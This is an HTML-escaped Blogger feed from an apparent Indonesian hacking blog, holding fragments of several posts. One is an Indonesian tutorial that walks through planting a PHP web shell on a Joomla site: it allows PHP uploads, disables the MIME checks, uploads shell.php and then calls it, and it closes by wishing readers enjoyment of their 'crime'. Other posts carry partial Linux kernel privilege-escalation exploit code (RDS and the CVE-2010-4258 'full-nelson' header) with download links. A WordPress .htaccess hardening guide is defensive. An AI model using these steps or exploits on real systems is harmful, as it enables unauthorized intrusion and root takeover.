&lt;/code&gt;&lt;code class="cpp comments"&gt;* need them.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Greets to spender, kees, taviso, hawkes, team lollerskaters,&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* joberheide, bla, sts, and VSR&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*/&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdio.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;unistd.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;stdlib.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;fcntl.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/types.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/socket.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;netinet/in.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;errno.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;string.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/ptrace.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#include &lt;sys/utsname.h&gt;&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#define RECVPORT 5555 &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="cpp preprocessor"&gt;#define SENDPORT 6666&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;code class="cpp color1 bold"&gt;int&lt;/code&gt; &lt;code class="cpp plain"&gt;prep_sock(&lt;/code&gt;&lt;code class="cpp color1 bold"&gt;int&lt;/code&gt; &lt;code class="cpp plain"&gt;port)&lt;br /&gt;&lt;a href="http://www.exploit-db.com/exploits/15285/"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download Full&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1457025648251894467?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/mXrFPF4t_EY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1457025648251894467?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1457025648251894467?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/mXrFPF4t_EY/linux-rds-protocol-local-privilege.html" title="Linux RDS Protocol Local Privilege Escalation" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/linux-rds-protocol-local-privilege.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08CRHo_eSp7ImA9Wx9QFU4.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-9192325557763801038</id><published>2010-12-27T08:25:00.008+07:00</published><updated>2010-12-28T19:37:45.441+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-28T19:37:45.441+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Easy Upload Shell in Joomla</title><content type="html">Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau  koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin  setting biar tidak ada aplikasi yang boleh di install, nah ini caranya  gan, lebih praktis juga loh. Langsung aja lah..&lt;div style="text-align: justify;" class="entry"&gt; &lt;p&gt;Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.&lt;br /&gt;jangan lupa kopi + rokok, biar lancar awkakwkakwkawk&lt;/p&gt; &lt;p&gt;1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak  dibagian tengah, atau klik site &gt; pilih Global Configuration, kalau udah  Pilih System, lihat gambar dibawah ini.&lt;/p&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf2xZGB57I/AAAAAAAAAEI/bK4pRIRqOLk/s1600/joom2-300x216.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 300px; height: 216px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf2xZGB57I/AAAAAAAAAEI/bK4pRIRqOLk/s320/joom2-300x216.png" alt="" id="BLOGGER_PHOTO_ID_5555179993794996146" border="0" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;2. Pada bagian Media Settings, &lt;strong&gt;Legal Extensions (File Types)&lt;/strong&gt; kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP  atau ODG ada juga JPG.  Rubahlah jadi PHP,  kalau sudah liaht pada bagian &lt;strong&gt;Restrict Uploads&lt;/strong&gt; dan &lt;strong&gt;Check MIME Types&lt;/strong&gt;, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.&lt;br /&gt;Perhatiin pada bagian &lt;strong&gt;Legal MIME Types&lt;/strong&gt;  nah pada bagian disitu kan banyak tuh tulisan kayak  image/jpeg,image/gif,image dll lah, pilih pada bagian belakang  klo gak salah X-ZIP atau yang mana aja terserah  pokoknya  rubah jadi PHP. Kalau sudah di save then  NEXT STEP.&lt;/p&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3AbvheFI/AAAAAAAAAEQ/kUlAI9zP2cs/s1600/joom3-300x277.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 300px; height: 277px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3AbvheFI/AAAAAAAAAEQ/kUlAI9zP2cs/s320/joom3-300x277.png" alt="" id="BLOGGER_PHOTO_ID_5555180252203939922" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;3. Pada langkah nomor 2 kalau berahasil ada tulisan “The Global  Configuration details have been updated.” klo gagal “An Error has  occurred! Unable to open configuration.php file to write!”.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.&lt;br /&gt;disini kita ngomongin yang berhasil, kalau berahasil pilih &lt;strong&gt;MEDIA MANAGER&lt;/strong&gt;. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php&lt;br /&gt;kalau sukses, hasilnya seperti screen shoot dibawah ini..&lt;/p&gt;&lt;p style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3KljsI8I/AAAAAAAAAEY/43Mk0CO1_P4/s1600/joom5-300x178.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 311px; height: 185px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3KljsI8I/AAAAAAAAAEY/43Mk0CO1_P4/s320/joom5-300x178.png" alt="" id="BLOGGER_PHOTO_ID_5555180426637353922" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p&gt;4. Selanjutnya pemanggilan URL shell nya seperti ini: &lt;strong&gt;http://[localhost]/images/shell.php&lt;/strong&gt;  &lt;/p&gt; &lt;p&gt;Mudah kan,gagaga...selamat menikmati hasil kejahatan anda..&lt;br /&gt;Just share buat newbie,yang udah mastah dilarang keras baca ini artikel..!!&lt;/p&gt;    &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-9192325557763801038?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/K7FnZii7YwY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/9192325557763801038?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/9192325557763801038?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/K7FnZii7YwY/easy-upload-shell-in-joomla.html" title="Easy Upload Shell in Joomla" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf2xZGB57I/AAAAAAAAAEI/bK4pRIRqOLk/s72-c/joom2-300x216.png" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/easy-upload-shell-in-joomla.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CU8MR3wzeSp7ImA9Wx9QFEw.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-6239751961398484511</id><published>2010-12-27T07:28:00.000+07:00</published><updated>2010-12-27T08:38:06.281+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-27T08:38:06.281+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Protect  WordPress Directory with .Htaccess</title><content type="html">&lt;div style="text-align: justify;" class="entry"&gt;   &lt;p&gt;Kembali lagi ma ane gan, kali ini kita membahas soal keamanan wordpress,kita membahas  salah satu keamanan seperti judul di atas, dengan file &lt;strong&gt;.htaccess&lt;/strong&gt;. Mungkin banyak yang sudah tahu atau yang sudah membahas tentang ini,tapi tidak ada salahnya jika mau dishare lagi.. &lt;img src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt; &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;Mari kita bahas tentang file &lt;strong&gt;.htaccess&lt;/strong&gt;,apa itu &lt;em&gt;&lt;strong&gt;.htacess&lt;/strong&gt;&lt;/em&gt;..? file &lt;strong&gt;.htaccess&lt;/strong&gt; adalah file teks &lt;em&gt;&lt;strong&gt;ASCII&lt;/strong&gt;&lt;/em&gt; yang terletak di dalam root  direktori biasanya “&lt;strong&gt;public_html&lt;/strong&gt;” atau klo hosting free di “&lt;strong&gt;htdocs&lt;/strong&gt;” &lt;span id="more-206"&gt;&lt;/span&gt;yang sering digunakan untuk mengubah  pengaturan default dari web server yang digunakan. Sehingga manfaat dari  file &lt;strong&gt;.htaccess&lt;/strong&gt; ini besar sekali. Dan merupakan Web Utility yang sering  digunakan oleh para web master.&lt;br /&gt;lalu apa saja yang harus di amankan di wordpress.?bnyak gan,conthnya &lt;strong&gt;/wp-admin&lt;/strong&gt;,&lt;strong&gt;/wp-includes&lt;/strong&gt;,&lt;strong&gt;wp-login.php&lt;/strong&gt;,&lt;strong&gt;wp-db.php&lt;/strong&gt;,&lt;strong&gt;wp-config.php&lt;/strong&gt; ./etc..&lt;br /&gt;langsung aja gan, source code yang nanti ane kasih agan tinggal copy lalu paste aja di .htaccess,udah tahu kali.. &lt;img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Akses halaman /Wp-Admin Login dengan Private IP/Single IP&lt;/strong&gt;&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;AuthUserFile /dev/null&lt;/p&gt; &lt;p&gt;AuthGroupFile /dev/null&lt;/p&gt; &lt;p&gt;AuthName “Access Control”&lt;/p&gt; &lt;p&gt;AuthType Basic&lt;/p&gt; &lt;p&gt;order deny,allow&lt;/p&gt; &lt;p&gt;deny from all&lt;/p&gt; &lt;p&gt;# IP address sobat&lt;/p&gt; &lt;p&gt;allow from&lt;strong&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;**.***.***.**&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Coba perhatikan sama huruf yang berwarna merah itu gan, &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;strong&gt;**.***.***.**&lt;/strong&gt;&lt;/span&gt; rubah sama IP agan,jadi khusus satu IP aja yang bisa akses halaman itu.. &lt;img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt;&lt;br /&gt;Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm  tenang gan, kita lanjut ke wp-login.php, pake private IP juga.. &lt;img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt; &lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;files&gt;&lt;/p&gt; &lt;p&gt;Order deny,allow&lt;/p&gt; &lt;p&gt;Deny from All&lt;/p&gt; &lt;p&gt;Allow from &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;strong&gt;**.***.***.**&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;/files&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;&lt;span style="color: rgb(255, 0, 0);"&gt; &lt;/span&gt;sama seperti diatas, ganti tulisan yang berwarna merah pake IP agan, kalau buat yang IP nya dinamis mending tidak usah, coz itu cuma buat satu IP doanq,&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Amankan Wp-Config.php&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Lanjut gan,sekarang kita mw amanin file wp-config.php,dh tahu kan  wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. &lt;img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt;&lt;br /&gt;nih codenya..&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;# protect wpconfig.php&lt;/p&gt; &lt;p&gt;&lt;files&gt;&lt;/p&gt; &lt;p&gt;order allow,deny&lt;/p&gt; &lt;p&gt;deny from all&lt;/p&gt; &lt;p&gt;&lt;/files&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata  orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang  bisa ngebongkar semua data penting kita gan,&lt;br /&gt;buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file  index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti  terjadi error gitu kan, klo emang disitu kelemahanya marilah kita  tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus  isi sama code ini..&lt;/p&gt; &lt;blockquote&gt;&lt;p&gt;&lt;ifmodule&gt;&lt;br /&gt;RewriteEngine On&lt;br /&gt;RewriteBase /&lt;br /&gt;RewriteRule .*\.php$ &lt;span style="color: rgb(255, 0, 0);"&gt;readme.html&lt;/span&gt; [L]&lt;br /&gt;&lt;/ifmodule&gt;&lt;/p&gt;&lt;/blockquote&gt; &lt;p&gt;Perhatikan sama tulisan yang berwarna merah itu, itu file readme dari  wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara  di atas.&lt;/p&gt; &lt;p&gt;Ok selesai,semoga bermanfaat dan berguna.. &lt;img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /&gt; &lt;/p&gt;    &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6239751961398484511?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/1I2hmN_s-x8" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6239751961398484511?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6239751961398484511?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/1I2hmN_s-x8/protect-wordpress-directory-with.html" title="Protect  WordPress Directory with .Htaccess" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/protect-wordpress-directory-with.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUcFQn85fip7ImA9Wx9WEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-6555978698869605259</id><published>2010-12-20T18:15:00.000+07:00</published><updated>2011-01-17T18:16:53.126+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-17T18:16:53.126+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux-Kernel" /><title>Linux Kernel  2.6.37 Local Privilege Escalation</title><content type="html">&lt;code class="cpp comments"&gt;/*&lt;/code&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Linux Kernel &lt;= 2.6.37 local privilege escalation&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* by Dan Rosenberg&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* @djrbliss on twitter&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Usage:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* gcc full-nelson.c -o full-nelson&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* ./full-nelson&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* This exploit leverages three vulnerabilities to get root, all of which were&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* discovered by Nelson Elhage:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* CVE-2010-4258&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* -------------&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp 